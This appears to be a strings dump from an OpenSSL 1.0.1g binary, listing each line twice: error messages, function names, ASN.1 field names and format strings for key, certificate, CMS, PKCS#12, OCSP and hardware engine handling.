expecting a dh key
expecting a dh key
expecting an rsa key
expecting an rsa key
different key types
different key types
ctrl operation not implemented
ctrl operation not implemented
command not supported
command not supported
camellia key setup failed
camellia key setup failed
bn pubkey error
bn pubkey error
bad key length
bad key length
aes key setup failed
aes key setup failed
PKEY_SET_TYPE
PKEY_SET_TYPE
PKCS5_V2_PBKDF2_KEYIVGEN
PKCS5_V2_PBKDF2_KEYIVGEN
PKCS5_v2_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
PKCS5_PBE_keyivgen
PKCS5_PBE_keyivgen
FIPS_CIPHER_CTX_SET_KEY_LENGTH
FIPS_CIPHER_CTX_SET_KEY_LENGTH
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_recover
EVP_PKEY_verify_init
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_verify
EVP_PKEY_sign_init
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_sign
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_paramgen
EVP_PKEY_new
EVP_PKEY_new
EVP_PKEY_keygen_init
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_keygen
EVP_PKEY_get1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_get1_EC_KEY
EVP_PKEY_get1_EC_KEY
EVP_PKEY_GET1_ECDSA
EVP_PKEY_GET1_ECDSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DH
EVP_PKEY_get1_DH
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_encrypt
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_init
EVP_PKEY_derive_init
EVP_PKEY_derive
EVP_PKEY_derive
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_decrypt
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl
EVP_PKEY_copy_parameters
EVP_PKEY_copy_parameters
EVP_PKEY2PKCS8_broken
EVP_PKEY2PKCS8_broken
EVP_PKCS82PKEY_BROKEN
EVP_PKCS82PKEY_BROKEN
EVP_PKCS82PKEY
EVP_PKCS82PKEY
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_set_key_length
ECKEY_PKEY2PKCS8
ECKEY_PKEY2PKCS8
ECDSA_PKEY2PKCS8
ECDSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSAPKEY2PKCS8
DSAPKEY2PKCS8
D2I_PKEY
D2I_PKEY
CAMELLIA_INIT_KEY
CAMELLIA_INIT_KEY
AES_INIT_KEY
AES_INIT_KEY
AESNI_INIT_KEY
AESNI_INIT_KEY
.\crypto\evp\evp_pkey.c
.\crypto\evp\evp_pkey.c
EVP_CIPHER_key_length(cipher)
EVP_CIPHER_key_length(cipher)
keylen
keylen
ddddddZ
ddddddZ
ddddddZ
ddddddZ
'() ,-./:=?
'() ,-./:=?
\X
\X
X509_PUBKEY
X509_PUBKEY
public_key
public_key
.\crypto\asn1\x_pubkey.c
.\crypto\asn1\x_pubkey.c
pubkey
pubkey
value.single
value.single
value.set
value.set
cert_info
cert_info
X509_CERT_PAIR
X509_CERT_PAIR
X509_CERT_AUX
X509_CERT_AUX
keyid
keyid
NETSCAPE_CERT_SEQUENCE
NETSCAPE_CERT_SEQUENCE
certs
certs
cert
cert
%8sRequested Extensions:
%8sRequested Extensions:
sa0:00
sa0:00
%8sAttributes:
%8sAttributes:
sUnable to load Public Key
sUnable to load Public Key
sPublic Key Algorithm:
sPublic Key Algorithm:
Subject Public Key Info:
Subject Public Key Info:
Subject:%c
Subject:%c
%8sVersion: %s%lu (%s0x%lx)
%8sVersion: %s%lu (%s0x%lx)
Certificate Request:
Certificate Request:
Public key OCSP hash:
Public key OCSP hash:
%s - d:d:d%.*s %d%s
%s - d:d:d%.*s %d%s
%s - d:d:d %d%s
%s - d:d:d %d%s
Issuer:%c
Issuer:%c
s%s
s%s
%s%lu (%s0x%lx)
%s%lu (%s0x%lx)
%8sVersion: %lu (0x%lx)
%8sVersion: %lu (0x%lx)
Certificate:
Certificate:
%sX
%sX
%*sKey Id:
%*sKey Id:
%*sAlias: %s
%*sAlias: %s
No Revoked Certificates.
No Revoked Certificates.
Revoked Certificates:
Revoked Certificates:
%8sNext Update:
%8sNext Update:
%8sLast Update:
%8sLast Update:
%8sIssuer: %s
%8sIssuer: %s
%8sVersion %lu (0x%lx)
%8sVersion %lu (0x%lx)
Certificate Revocation List (CRL):
Certificate Revocation List (CRL):
%s %s%lu (%s0x%lx)
%s %s%lu (%s0x%lx)
Signature Algorithm: %s
Signature Algorithm: %s
Challenge String: %s
Challenge String: %s
Unable to load public key
Unable to load public key
Public Key Algorithm: %s
Public Key Algorithm: %s
%s (%s)
%s (%s)
Unprocessed type %d
Unprocessed type %d
ERROR: selector [%d] invalid
ERROR: selector [%d] invalid
:EXTERNAL TYPE %s
:EXTERNAL TYPE %s
%*s%s:
%*s%s:
%*s%s OF %s {
%*s%s OF %s {
NETSCAPE_PKEY
NETSCAPE_PKEY
private_key
private_key
NETSCAPE_ENCRYPTED_PKEY
NETSCAPE_ENCRYPTED_PKEY
enckey
enckey
SGCKEYSALT
SGCKEYSALT
Enter Private Key password:
Enter Private Key password:
private-key
private-key
.\crypto\asn1\n_pkey.c
.\crypto\asn1\n_pkey.c
.\crypto\asn1\x_pkey.c
.\crypto\asn1\x_pkey.c
-----END %s-----
-----END %s-----
-----BEGIN %s-----
-----BEGIN %s-----
Content-Transfer-Encoding: base64%s%s
Content-Transfer-Encoding: base64%s%s
name="%s"%s
name="%s"%s
smime-type=%s;
smime-type=%s;
Content-Type: %smime;
Content-Type: %smime;
filename="%s"%s
filename="%s"%s
certs-only
certs-only
%s------%s--%s%s
%s------%s--%s%s
filename="smime.p7s"%s%s
filename="smime.p7s"%s%s
Content-Transfer-Encoding: base64%s
Content-Transfer-Encoding: base64%s
name="smime.p7s"%s
name="smime.p7s"%s
Content-Type: %ssignature;
Content-Type: %ssignature;
%s------%s%s
%s------%s%s
------%s%s
------%s%s
This is an S/MIME signed message%s%s
This is an S/MIME signed message%s%s
"; boundary="----%s"%s%s
"; boundary="----%s"%s%s
protocol="%ssignature";
protocol="%ssignature";
MIME-Version: 1.0%s
MIME-Version: 1.0%s
appl [ %d ]
appl [ %d ]
cont [ %d ]
cont [ %d ]
priv [ %d ]
priv [ %d ]
ASN.1 part of OpenSSL 1.0.1g 7 Apr 2014
ASN.1 part of OpenSSL 1.0.1g 7 Apr 2014
unsupported type
unsupported type
unsupported public key type
unsupported public key type
unsupported encryption algorithm
unsupported encryption algorithm
unsupported any defined by type
unsupported any defined by type
unknown public key type
unknown public key type
unable to decode rsa private key
unable to decode rsa private key
unable to decode rsa key
unable to decode rsa key
streaming not supported
streaming not supported
private key header missing
private key header missing
digest and key type not supported
digest and key type not supported
bad password read
bad password read
X509_PKEY_new
X509_PKEY_new
i2d_RSA_PUBKEY
i2d_RSA_PUBKEY
i2d_PublicKey
i2d_PublicKey
i2d_PrivateKey
i2d_PrivateKey
i2d_EC_PUBKEY
i2d_EC_PUBKEY
i2d_DSA_PUBKEY
i2d_DSA_PUBKEY
d2i_X509_PKEY
d2i_X509_PKEY
d2i_PublicKey
d2i_PublicKey
d2i_PrivateKey
d2i_PrivateKey
d2i_AutoPrivateKey
d2i_AutoPrivateKey
keylength
keylength
keyfunc
keyfunc
PKCS8_PRIV_KEY_INFO
PKCS8_PRIV_KEY_INFO
pkey
pkey
pkeyalg
pkeyalg
EC PRIVATE KEY
EC PRIVATE KEY
DSA PRIVATE KEY
DSA PRIVATE KEY
RSA PRIVATE KEY
RSA PRIVATE KEY
TRUSTED CERTIFICATE
TRUSTED CERTIFICATE
X509 CERTIFICATE
X509 CERTIFICATE
CERTIFICATE
CERTIFICATE
PEM part of OpenSSL 1.0.1g 7 Apr 2014
PEM part of OpenSSL 1.0.1g 7 Apr 2014
phrase is too short, needs to be at least %d chars
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
Enter PEM pass phrase:
CERTIFICATE REQUEST
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
PRIVATE KEY
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
ANY PRIVATE KEY
RSA PUBLIC KEY
RSA PUBLIC KEY
PUBLIC KEY
PUBLIC KEY
unsupported key components
unsupported key components
unsupported encryption
unsupported encryption
read key
read key
public key no rsa
public key no rsa
problems getting password
problems getting password
keyblob too short
keyblob too short
keyblob header parse error
keyblob header parse error
expecting public key blob
expecting public key blob
expecting private key blob
expecting private key blob
error converting private key
error converting private key
PEM_WRITE_PRIVATEKEY
PEM_WRITE_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_PK8PKEY
PEM_PK8PKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
DO_PK8PKEY_FP
DO_PK8PKEY_FP
DO_PK8PKEY
DO_PK8PKEY
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_bio
CERTIFICATE PAIR
CERTIFICATE PAIR
.\crypto\pem\pem_pkey.c
.\crypto\pem\pem_pkey.c
%s PRIVATE KEY
%s PRIVATE KEY
%s PARAMETERS
%s PARAMETERS
/usr/local/ssl/certs
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_DIR
SSL_CERT_FILE
SSL_CERT_FILE
X.509 part of OpenSSL 1.0.1g 7 Apr 2014
X.509 part of OpenSSL 1.0.1g 7 Apr 2014
OPENSSL_ALLOW_PROXY_CERTS
OPENSSL_ALLOW_PROXY_CERTS
unknown key type
unknown key type
unable to get certs public key
unable to get certs public key
public key encode error
public key encode error
public key decode error
public key decode error
no cert set for us to verify
no cert set for us to verify
loading cert dir
loading cert dir
key values mismatch
key values mismatch
key type mismatch
key type mismatch
cert already in hash table
cert already in hash table
cant check dh key
cant check dh key
X509_verify_cert
X509_verify_cert
X509_STORE_add_cert
X509_STORE_add_cert
X509_REQ_check_private_key
X509_REQ_check_private_key
X509_PUBKEY_set
X509_PUBKEY_set
X509_PUBKEY_get
X509_PUBKEY_get
X509_load_cert_file
X509_load_cert_file
X509_load_cert_crl_file
X509_load_cert_crl_file
X509_get_pubkey_parameters
X509_get_pubkey_parameters
X509_check_private_key
X509_check_private_key
GET_CERT_BY_SUBJECT
GET_CERT_BY_SUBJECT
ADD_CERT_DIR
ADD_CERT_DIR
unsupported or invalid name syntax
unsupported or invalid name syntax
unsupported or invalid name constraint syntax
unsupported or invalid name constraint syntax
unsupported name constraint type
unsupported name constraint type
name constraints minimum and maximum not supported
name constraints minimum and maximum not supported
Unsupported extension feature
Unsupported extension feature
invalid or inconsistent certificate policy extension
invalid or inconsistent certificate policy extension
invalid or inconsistent certificate extension
invalid or inconsistent certificate extension
key usage does not include digital signature
key usage does not include digital signature
key usage does not include CRL signing
key usage does not include CRL signing
unable to get CRL issuer certificate
unable to get CRL issuer certificate
key usage does not include certificate signing
key usage does not include certificate signing
authority and subject key identifier mismatch
authority and subject key identifier mismatch
certificate rejected
certificate rejected
certificate not trusted
certificate not trusted
unsupported certificate purpose
unsupported certificate purpose
proxy certificates not allowed, please set the appropriate flag
proxy certificates not allowed, please set the appropriate flag
invalid non-CA certificate (has CA markings)
invalid non-CA certificate (has CA markings)
invalid CA certificate
invalid CA certificate
certificate revoked
certificate revoked
certificate chain too long
certificate chain too long
unable to verify the first certificate
unable to verify the first certificate
unable to get local issuer certificate
unable to get local issuer certificate
self signed certificate in certificate chain
self signed certificate in certificate chain
self signed certificate
self signed certificate
format error in certificate's notAfter field
format error in certificate's notAfter field
format error in certificate's notBefore field
format error in certificate's notBefore field
certificate has expired
certificate has expired
certificate is not yet valid
certificate is not yet valid
certificate signature failure
certificate signature failure
unable to decode issuer public key
unable to decode issuer public key
unable to decrypt certificate's signature
unable to decrypt certificate's signature
unable to get certificate CRL
unable to get certificate CRL
unable to get issuer certificate
unable to get issuer certificate
Load certs from files in a directory
Load certs from files in a directory
%s%clx.%s%d
%s%clx.%s%d
keyCertSign
keyCertSign
Certificate Sign
Certificate Sign
keyAgreement
keyAgreement
Key Agreement
Key Agreement
keyEncipherment
keyEncipherment
Key Encipherment
Key Encipherment
EXTENDED_KEY_USAGE
EXTENDED_KEY_USAGE
%*s
%*s
%*s%s
%*s%s
unsupported option
unsupported option
unable to get issuer keyid
unable to get issuer keyid
policy syntax not currently supported
policy syntax not currently supported
operation not defined
operation not defined
no public key
no public key
no proxy cert policy language defined
no proxy cert policy language defined
no issuer certificate
no issuer certificate
extension setting not supported
extension setting not supported
V2I_EXTENDED_KEY_USAGE
V2I_EXTENDED_KEY_USAGE
V2I_AUTHORITY_KEYID
V2I_AUTHORITY_KEYID
S2I_SKEY_ID
S2I_SKEY_ID
S2I_ASN1_SKEY_ID
S2I_ASN1_SKEY_ID
R2I_CERTPOL
R2I_CERTPOL
d.registeredID
d.registeredID
d.iPAddress
d.iPAddress
d.uniformResourceIdentifier
d.uniformResourceIdentifier
d.ediPartyName
d.ediPartyName
d.directoryName
d.directoryName
d.dNSName
d.dNSName
d.rfc822Name
d.rfc822Name
d.otherName
d.otherName
IP Address:%d.%d.%d.%d
IP Address:%d.%d.%d.%d
URI:%s
URI:%s
DNS:%s
DNS:%s
email:%s
email:%s
EdiPartyName:
EdiPartyName:
X400Name:
X400Name:
othername:
othername:
.\crypto\x509v3\v3_skey.c
.\crypto\x509v3\v3_skey.c
.\crypto\x509v3\v3_akey.c
.\crypto\x509v3\v3_akey.c
PKEY_USAGE_PERIOD
PKEY_USAGE_PERIOD
certificateHold
certificateHold
Certificate Hold
Certificate Hold
cessationOfOperation
cessationOfOperation
Cessation Of Operation
Cessation Of Operation
keyCompromise
keyCompromise
Key Compromise
Key Compromise
%*sZone: %s, User:
%*sZone: %s, User:
d.usernotice
d.usernotice
d.cpsuri
d.cpsuri
d.other
d.other
CERTIFICATEPOLICIES
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sExplicit Text: %s
%*sNumber%s:
%*sNumber%s:
%*sOrganization: %s
%*sOrganization: %s
%*sCPS: %s
%*sCPS: %s
name.relativename
name.relativename
name.fullname
name.fullname
%*sOnly Attribute Certificates
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
%*sOnly User Certificates
%*scrlUrl:
%*scrlUrl:
AUTHORITY_KEYID
AUTHORITY_KEYID
%d.%d.%d.%d/%d.%d.%d.%d
%d.%d.%d.%d/%d.%d.%d.%d
PROXY_CERT_INFO_EXTENSION
PROXY_CERT_INFO_EXTENSION
%*sPolicy Text: %s
%*sPolicy Text: %s
d.receiptList
d.receiptList
d.allOrFirstTier
d.allOrFirstTier
d.compressedData
d.compressedData
d.authenticatedData
d.authenticatedData
d.encryptedData
d.encryptedData
d.digestedData
d.digestedData
d.envelopedData
d.envelopedData
d.signedData
d.signedData
d.data
d.data
d.ori
d.ori
d.pwri
d.pwri
d.kekri
d.kekri
d.kari
d.kari
d.ktri
d.ktri
CMS_PasswordRecipientInfo
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyDerivationAlgorithm
keyIdentifier
keyIdentifier
CMS_KeyAgreeRecipientInfo
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
CMS_OriginatorIdentifierOrKey
d.originatorKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
CMS_OtherKeyAttribute
keyAttr
keyAttr
keyAttrId
keyAttrId
CMS_KeyTransRecipientInfo
CMS_KeyTransRecipientInfo
encryptedKey
encryptedKey
keyEncryptionAlgorithm
keyEncryptionAlgorithm
certificates
certificates
d.crl
d.crl
d.subjectKeyIdentifier
d.subjectKeyIdentifier
d.issuerAndSerialNumber
d.issuerAndSerialNumber
CMS_CertificateChoices
CMS_CertificateChoices
d.v2AttrCert
d.v2AttrCert
d.v1AttrCert
d.v1AttrCert
d.extendedCertificate
d.extendedCertificate
d.certificate
d.certificate
CMS_OtherCertificateFormat
CMS_OtherCertificateFormat
otherCert
otherCert
otherCertFormat
otherCertFormat
unsupported recpientinfo type
unsupported recpientinfo type
unsupported recipient type
unsupported recipient type
unsupported key encryption algorithm
unsupported key encryption algorithm
unsupported kek algorithm
unsupported kek algorithm
unsupported content type
unsupported content type
unsupported compression algorithm
unsupported compression algorithm
signer certificate not found
signer certificate not found
private key does not match certificate
private key does not match certificate
no private key
no private key
no password
no password
no msgsigdigest
no msgsigdigest
no key or cert
no key or cert
no key
no key
not supported for this key type
not supported for this key type
not key transport
not key transport
msgsigdigest wrong length
msgsigdigest wrong length
msgsigdigest verification failure
msgsigdigest verification failure
msgsigdigest error
msgsigdigest error
invalid key encryption parameter
invalid key encryption parameter
invalid encrypted key length
invalid encrypted key length
error setting key
error setting key
error getting public key
error getting public key
certificate verify error
certificate verify error
certificate has no keyid
certificate has no keyid
certificate already present
certificate already present
CMS_SIGNERINFO_VERIFY_CERT
CMS_SIGNERINFO_VERIFY_CERT
CMS_RecipientInfo_set0_pkey
CMS_RecipientInfo_set0_pkey
CMS_RecipientInfo_set0_password
CMS_RecipientInfo_set0_password
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_ktri_cert_cmp
CMS_RecipientInfo_ktri_cert_cmp
cms_msgSigDigest_add1
cms_msgSigDigest_add1
CMS_GET0_CERTIFICATE_CHOICES
CMS_GET0_CERTIFICATE_CHOICES
CMS_EncryptedData_set1_key
CMS_EncryptedData_set1_key
CMS_decrypt_set1_pkey
CMS_decrypt_set1_pkey
CMS_decrypt_set1_password
CMS_decrypt_set1_password
CMS_decrypt_set1_key
CMS_decrypt_set1_key
CMS_add1_recipient_cert
CMS_add1_recipient_cert
CMS_add0_recipient_password
CMS_add0_recipient_password
CMS_add0_recipient_key
CMS_add0_recipient_key
CMS_add0_cert
CMS_add0_cert
CONF part of OpenSSL 1.0.1g 7 Apr 2014
CONF part of OpenSSL 1.0.1g 7 Apr 2014
CONF_def part of OpenSSL 1.0.1g 7 Apr 2014
CONF_def part of OpenSSL 1.0.1g 7 Apr 2014
[[%s]]
[[%s]]
[%s] %s=%s
[%s] %s=%s
openssl.cnf
openssl.cnf
!BN_is_zero(p->zkpx.gr)
!BN_is_zero(p->zkpx.gr)
hash of key mismatch
hash of key mismatch
hash of hash of key mismatch
hash of hash of key mismatch
TXT_DB part of OpenSSL 1.0.1g 7 Apr 2014
TXT_DB part of OpenSSL 1.0.1g 7 Apr 2014
wrong number of fields on line %ld (looking for field %d, got %d, '%s' left)
wrong number of fields on line %ld (looking for field %d, got %d, '%s' left)
enc_key
enc_key
key_enc_algor
key_enc_algor
d.encrypted
d.encrypted
d.digest
d.digest
d.signed_and_enveloped
d.signed_and_enveloped
d.enveloped
d.enveloped
d.sign
d.sign
unsupported cipher type
unsupported cipher type
unknown operation
unknown operation
unable to find certificate
unable to find certificate
signing not supported for this key type
signing not supported for this key type
operation not supported on this type
operation not supported on this type
no recipient matches key
no recipient matches key
no recipient matches certificate
no recipient matches certificate
encryption not supported for this key type
encryption not supported for this key type
decrypted key is wrong length
decrypted key is wrong length
PKCS7_add_certificate
PKCS7_add_certificate
value.bag
value.bag
value.safes
value.safes
value.shkeybag
value.shkeybag
value.keybag
value.keybag
value.sdsicert
value.sdsicert
value.x509cert
value.x509cert
value.other
value.other
.\crypto\pkcs12\p12_crt.c
.\crypto\pkcs12\p12_crt.c
.\crypto\pkcs12\p12_key.c
.\crypto\pkcs12\p12_key.c
unsupported pkcs12 mode
unsupported pkcs12 mode
key gen error
key gen error
PKCS8_add_keyusage
PKCS8_add_keyusage
PKCS12_PBE_keyivgen
PKCS12_PBE_keyivgen
PKCS12_newpass
PKCS12_newpass
PKCS12_MAKE_SHKEYBAG
PKCS12_MAKE_SHKEYBAG
PKCS12_MAKE_KEYBAG
PKCS12_MAKE_KEYBAG
PKCS12_key_gen_uni
PKCS12_key_gen_uni
PKCS12_key_gen_asc
PKCS12_key_gen_asc
PKCS12_add_localkeyid
PKCS12_add_localkeyid
zlib not supported
zlib not supported
unimplemented public key method
unimplemented public key method
invalid cmd number
invalid cmd number
invalid cmd name
invalid cmd name
failed loading public key
failed loading public key
failed loading private key
failed loading private key
cmd not executable
cmd not executable
ENGINE_UNLOAD_KEY
ENGINE_UNLOAD_KEY
ENGINE_load_ssl_client_cert
ENGINE_load_ssl_client_cert
ENGINE_load_public_key
ENGINE_load_public_key
ENGINE_load_private_key
ENGINE_load_private_key
ENGINE_get_pkey_meth
ENGINE_get_pkey_meth
ENGINE_get_pkey_asn1_meth
ENGINE_get_pkey_asn1_meth
ENGINE_ctrl_cmd_string
ENGINE_ctrl_cmd_string
ENGINE_ctrl_cmd
ENGINE_ctrl_cmd
ENGINE_cmd_is_executable
ENGINE_cmd_is_executable
.\crypto\engine\eng_pkey.c
.\crypto\engine\eng_pkey.c
PKEY_ASN1
PKEY_ASN1
PKEY_CRYPTO
PKEY_CRYPTO
PKEY
PKEY
Software engine support
Software engine support
(TEST_ENG_OPENSSL_RC4) test_init_key() called
(TEST_ENG_OPENSSL_RC4) test_init_key() called
(TEST_ENG_OPENSSL_PKEY)Loading Private key %s
(TEST_ENG_OPENSSL_PKEY)Loading Private key %s
Dynamic engine loading support
Dynamic engine loading support
crlUrl
crlUrl
certStatus
certStatus
certId
certId
OCSP_CERTSTATUS
OCSP_CERTSTATUS
value.unknown
value.unknown
value.revoked
value.revoked
value.good
value.good
value.byKey
value.byKey
value.byName
value.byName
reqCert
reqCert
OCSP_CERTID
OCSP_CERTID
issuerKeyHash
issuerKeyHash
Content-Length: %d
Content-Length: %d
POST %s HTTP/1.0
POST %s HTTP/1.0
%*sIssuer Key Hash:
%*sIssuer Key Hash:
%*sCertificate ID:
%*sCertificate ID:
Revocation Reason: %s (0x%lx)
Revocation Reason: %s (0x%lx)
Cert Status: %s
Cert Status: %s
OCSP Response Status: %s (0x%lx)
OCSP Response Status: %s (0x%lx)
unsupported requestorname type
unsupported requestorname type
no certificates in chain
no certificates in chain
error parsing url
error parsing url
PARSE_HTTP_LINE1
PARSE_HTTP_LINE1
OCSP_parse_url
OCSP_parse_url
OCSP_cert_id_new
OCSP_cert_id_new
Verifying - %s
Verifying - %s
subkey
subkey
KRB5_ENCKEY
KRB5_ENCKEY
keyvalue
keyvalue
msgtype
msgtype
xxxxxxxx
xxxxxxxx
3unsupported version
3unsupported version
unsupported md algorithm
unsupported md algorithm
invalid signer certificate purpose
invalid signer certificate purpose
ess signing certificate error
ess signing certificate error
ess add signing cert error
ess add signing cert error
TS_VERIFY_CERT
TS_VERIFY_CERT
TS_TST_INFO_set_msg_imprint
TS_TST_INFO_set_msg_imprint
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_certs
TS_REQ_set_msg_imprint
TS_REQ_set_msg_imprint
TS_MSG_IMPRINT_set_algo
TS_MSG_IMPRINT_set_algo
TS_CHECK_SIGNING_CERTS
TS_CHECK_SIGNING_CERTS
ESS_SIGNING_CERT_NEW_INIT
ESS_SIGNING_CERT_NEW_INIT
ESS_CERT_ID_NEW_INIT
ESS_CERT_ID_NEW_INIT
ESS_ADD_SIGNING_CERT
ESS_ADD_SIGNING_CERT
Certificate required: %s
Certificate required: %s
Version: %d
Version: %d
the requested extension is not supported by the TSA
the requested extension is not supported by the TSA
the requested TSA policy is not supported by the TSA
the requested TSA policy is not supported by the TSA
transaction not permitted or supported
transaction not permitted or supported
unrecognized or unsupported algorithm identifier
unrecognized or unsupported algorithm identifier
Ordering: %s
Ordering: %s
Message digest algorithm is not supported.
Message digest algorithm is not supported.
Requested policy is not supported.
Requested policy is not supported.
dddddd
dddddd
Unsupported extension.
Unsupported extension.
Hash Algorithm: %s
Hash Algorithm: %s
unable to load certificate: %s
unable to load certificate: %s
unable to load certificates: %s
unable to load certificates: %s
unable to load private key: %s
unable to load private key: %s
variable lookup failed for %s::%s
variable lookup failed for %s::%s
invalid variable value for %s::%s
invalid variable value for %s::%s
signer_cert
signer_cert
signer_key
signer_key
ess_cert_id_chain
ess_cert_id_chain
ESS_SIGNING_CERT
ESS_SIGNING_CERT
cert_ids
cert_ids
ESS_CERT_ID
ESS_CERT_ID
cert_req
cert_req
msg_imprint
msg_imprint
TS_MSG_IMPRINT
TS_MSG_IMPRINT
hashed_msg
hashed_msg
IBM 4758 CCA hardware engine support
IBM 4758 CCA hardware engine support
IBM_4758_LOAD_PUBKEY
IBM_4758_LOAD_PUBKEY
IBM_4758_LOAD_PRIVKEY
IBM_4758_LOAD_PRIVKEY
IBM 4758 CCA RSA key handle
IBM 4758 CCA RSA key handle
AEP_ModExpCrt
AEP_ModExpCrt
Aep hardware engine support
Aep hardware engine support
mod exp crt failed
mod exp crt failed
missing key components
missing key components
AEP_MOD_EXP_CRT
AEP_MOD_EXP_CRT
ASI_RSAPrivateKeyOpFn
ASI_RSAPrivateKeyOpFn
Atalla hardware engine support
Atalla hardware engine support
swAttachKeyParam
swAttachKeyParam
CryptoSwift hardware engine support
CryptoSwift hardware engine support
bad key size
bad key size
CSWIFT_MOD_EXP_CRT
CSWIFT_MOD_EXP_CRT
HWCryptoHook_ModExpCRT
HWCryptoHook_ModExpCRT
HWCryptoHook_RSAUnloadKey
HWCryptoHook_RSAUnloadKey
HWCryptoHook_RSAGetPublicKey
HWCryptoHook_RSAGetPublicKey
HWCryptoHook_RSALoadKey
HWCryptoHook_RSALoadKey
CHIL hardware engine support
CHIL hardware engine support
private key algorithms disabled
private key algorithms disabled
HWCRHK_LOAD_PUBKEY
HWCRHK_LOAD_PUBKEY
HWCRHK_LOAD_PRIVKEY
HWCRHK_LOAD_PRIVKEY
HWCRHK_GET_PASS
HWCRHK_GET_PASS
pass phrase
pass phrase
Insert card "%s"
Insert card "%s"
Current card: "%s"
Current card: "%s"
nFast HWCryptoHook RSA key handle
nFast HWCryptoHook RSA key handle
Nuron hardware engine support
Nuron hardware engine support
SureWareHook_Load_Dsa_Pubkey
SureWareHook_Load_Dsa_Pubkey
SureWareHook_Load_Rsa_Pubkey
SureWareHook_Load_Rsa_Pubkey
SureWareHook_Info_Pubkey
SureWareHook_Info_Pubkey
SureWareHook_Load_Privkey
SureWareHook_Load_Privkey
SureWare hardware engine support
SureWare hardware engine support
SUREWAREHK_LOAD_PUBKEY
SUREWAREHK_LOAD_PUBKEY
SUREWAREHK_LOAD_PRIVKEY
SUREWAREHK_LOAD_PRIVKEY
ENGINE_load_privkey
ENGINE_load_privkey
ENGINE_load_pubkey
ENGINE_load_pubkey
SureWareHook DSA key handle
SureWareHook DSA key handle
SureWareHook RSA key handle
SureWareHook RSA key handle
ubsec_max_key_len_ioctl
ubsec_max_key_len_ioctl
rsa_mod_exp_crt_ioctl
rsa_mod_exp_crt_ioctl
UBSEC hardware engine support
UBSEC hardware engine support
UBSEC_RSA_MOD_EXP_CRT
UBSEC_RSA_MOD_EXP_CRT
UBSEC_MOD_EXP_CRT
UBSEC_MOD_EXP_CRT
UBSEC_DH_GENERATE_KEY
UBSEC_DH_GENERATE_KEY
UBSEC_DH_COMPUTE_KEY
UBSEC_DH_COMPUTE_KEY
/dev/ubskey
/dev/ubskey
VIA PadLock (%s, %s)
VIA PadLock (%s, %s)
Certificate store flags: 1 = system store
Certificate store flags: 1 = system store
certificate store name, default "MY"
certificate store name, default "MY"
Set key lookup method (1=substring, 2=friendlyname, 3=container name)
Set key lookup method (1=substring, 2=friendlyname, 3=container name)
Set list options (1=summary,2=friendly name, 4=full printout, 8=PEM output, 16=XXX, 32=private key info)
Set list options (1=summary,2=friendly name, 4=full printout, 8=PEM output, 16=XXX, 32=private key info)
Key type: 1=AT_KEYEXCHANGE (default), 2=AT_SIGNATURE
Key type: 1=AT_KEYEXCHANGE (default), 2=AT_SIGNATURE
key_type
key_type
Lookup and output certificates
Lookup and output certificates
lookup_cert
lookup_cert
List all certificates in store
List all certificates in store
list_certs
list_certs
unsupported public key algorithm
unsupported public key algorithm
unsupported padding
unsupported padding
unsupported algorithm nid
unsupported algorithm nid
pubkey export length error
pubkey export length error
pubkey export error
pubkey export error
invalid rsa public key blob magic number
invalid rsa public key blob magic number
invalid public key blob
invalid public key blob
invalid dsa public key blob magic number
invalid dsa public key blob magic number
getuserkey error
getuserkey error
function not supported
function not supported
error getting key provider info
error getting key provider info
error adding cert
error adding cert
cant get key
cant get key
CLIENT_CERT_SELECT
CLIENT_CERT_SELECT
CERT_SELECT_DIALOG
